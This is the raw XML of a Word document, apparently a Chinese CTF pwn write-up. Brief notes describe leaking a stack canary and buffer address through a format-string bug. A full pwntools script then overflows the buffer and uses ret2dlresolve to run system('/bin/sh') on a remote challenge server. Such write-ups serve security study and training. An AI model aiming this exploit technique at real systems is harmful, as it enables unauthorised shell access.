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5DA6EC66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</w:p>
    <w:p w14:paraId="1AEF4043" w14:textId="510A3457" w:rsidR="00AF064E" w:rsidRDefault="00A53948" w:rsidP="00AF064E"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11BC349E" w:rsidR="00AF064E" w:rsidRDefault="00A53948" w:rsidP="001043FF">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pwn</w:t>
      </w:r>
      <w:r w:rsidR="00E31F60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+Flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A76CDE5" w14:textId="177F71F8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03034674" w14:textId="45662B97" w:rsidR="00AF064E" w:rsidRDefault="00A53948" w:rsidP="00944E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漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00C850A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，利用格式化字符串漏洞泄露</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C850A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C850A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址和canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05583DB7" w14:textId="0C92A66F" w:rsidR="00944EC9" w:rsidRDefault="00944EC9" w:rsidP="00944EC9">
      <w:r w:rsidRPr="00944EC9">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2DC5299B" wp14:editId="25B77401">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>60960</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>81280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3391373" cy="1705213"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="40445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572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DE467" w14:textId="69B5145C" w:rsidR="00944EC9" w:rsidRDefault="00944EC9" w:rsidP="00944EC9"/>
    <w:p w14:paraId="4FAE09D4" w14:textId="77777777" w:rsidR="00944EC9" w:rsidRDefault="00944EC9" w:rsidP="00944EC9"/>
    <w:p w14:paraId="5B5DCE89" w14:textId="4D77EB82" w:rsidR="00944EC9" w:rsidRDefault="00944EC9" w:rsidP="00944EC9"/>
    <w:p w14:paraId="198F970C" w14:textId="77777777" w:rsidR="00944EC9" w:rsidRDefault="00944EC9" w:rsidP="00944EC9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B94331F" w14:textId="77777777" w:rsidR="00944EC9" w:rsidRDefault="00944EC9" w:rsidP="00AF064E"/>
    <w:p w14:paraId="76711867" w14:textId="77777777" w:rsidR="00944EC9" w:rsidRDefault="00944EC9" w:rsidP="00AF064E"/>
    <w:p w14:paraId="1099A5FB" w14:textId="77777777" w:rsidR="00944EC9" w:rsidRDefault="00944EC9" w:rsidP="00AF064E"/>
    <w:p w14:paraId="06C681D0" w14:textId="77777777" w:rsidR="00944EC9" w:rsidRDefault="00944EC9" w:rsidP="00AF064E"/>
    <w:p w14:paraId="19E32C4F" w14:textId="77777777" w:rsidR="00944EC9" w:rsidRDefault="00944EC9" w:rsidP="00AF064E"/>
    <w:p w14:paraId="4361AE9D" w14:textId="086EB35A" w:rsidR="00944EC9" w:rsidRDefault="00944EC9" w:rsidP="00AF064E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00944EC9">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A209A4D" wp14:editId="0636653D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-317500</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="539750"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20584"/>
                <wp:lineTo x="21532" y="20584"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="115374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40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8CC5B" w14:textId="77777777" w:rsidR="00944EC9" w:rsidRDefault="00944EC9" w:rsidP="00AF064E"/>
    <w:p w14:paraId="77D08D6C" w14:textId="1574A2DE" w:rsidR="00AF064E" w:rsidRDefault="00AF064E" w:rsidP="00AF064E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A53948">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ret2dlresolve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79878D88" w14:textId="67C7F37F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5706C133" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392EAB2D" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Crypto.Util.number</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>long_to_bytes,bytes_to_long</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E69BB88" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>context.log_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>='debug'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494C369C" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:r>
        <w:t>context(arch='i386</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>',os</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD7CF39" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>context.terminal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>','</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>splitw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>','-h']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71357B4C" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>'./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC7F84A" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:r>
        <w:t>p=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>remote(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'182.92.237.102',10012)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318CF518" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.sendlineafter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("what's the content?","%19$p%6$p./flag\x00\x00")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A354C4" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>read_a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0x80490f0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF79BC7" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.recvuntil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("0x")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791FDA16" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:r>
        <w:t>can=int(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(8),16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FE720E" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.recvuntil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("0x")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6A6ADD" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=int(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(7),16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169269B8" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:r>
        <w:t>print(hex(can))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EE6B9F" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:r>
        <w:t>print(hex(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA379F2" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:r>
        <w:t>payload=b'a'*(0x94-0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>xc)+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>p32(can)+b'a'*12+p32(read_a)+p32(0)+p32(0x080483B8)+p64(0x10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8A01D3" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>context.binary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = elf = ELF('./2')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2574A504" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ROP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>context.binary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EB481F" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dlresolve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = Ret2dlresolvePayload(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>elf,symbol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>='system',</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=['/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3A938C" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rop.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(0,dlresolve.data_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613B23DF" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rop.ret</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>2dlresolve(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dlresolve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DBFCD3" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>raw_rop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rop.chain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767F0A2F" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:r>
        <w:t>payload=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b'a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'*(0x94-0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>xc)+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>p32(can)+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b'a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'*12+raw_rop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B69D9F" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:r>
        <w:t>payload=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>payload.ljust</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(256)+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dlresolve.payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32C989A5" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>pause(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B25136" w14:textId="77777777" w:rsidR="00A53948" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.sendlineafter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Input:",payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A01A4B" w14:textId="6BE28664" w:rsidR="00EA3779" w:rsidRPr="00EA3779" w:rsidRDefault="00A53948" w:rsidP="00A53948">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(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7000E" w14:textId="77777777" w:rsidR="009D2552" w:rsidRDefault="009D2552" w:rsidP="00944EC9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="733499E4" w14:textId="77777777" w:rsidR="009D2552" w:rsidRDefault="009D2552" w:rsidP="00944E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FAEA0" w14:textId="77777777" w:rsidR="009D2552" w:rsidRDefault="009D2552" w:rsidP="00944EC9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="68785292" w14:textId="77777777" w:rsidR="009D2552" w:rsidRDefault="009D2552" w:rsidP="00944E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2E6F0A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="37ECE754"/>
    <w:lvl w:ilvl="0" w:tplc="2A544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5359777">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1670399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61096D"/>
    <w:rsid w:val="006D7CD7"/>
    <w:rsid w:val="00944EC9"/>
    <w:rsid w:val="009D2552"/>
    <w:rsid w:val="00A53948"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00C346CE"/>
    <w:rsid w:val="00C850A0"/>
    <w:rsid w:val="00E31F60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944EC9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44E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44EC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44E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9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-11T03:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-01T07:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>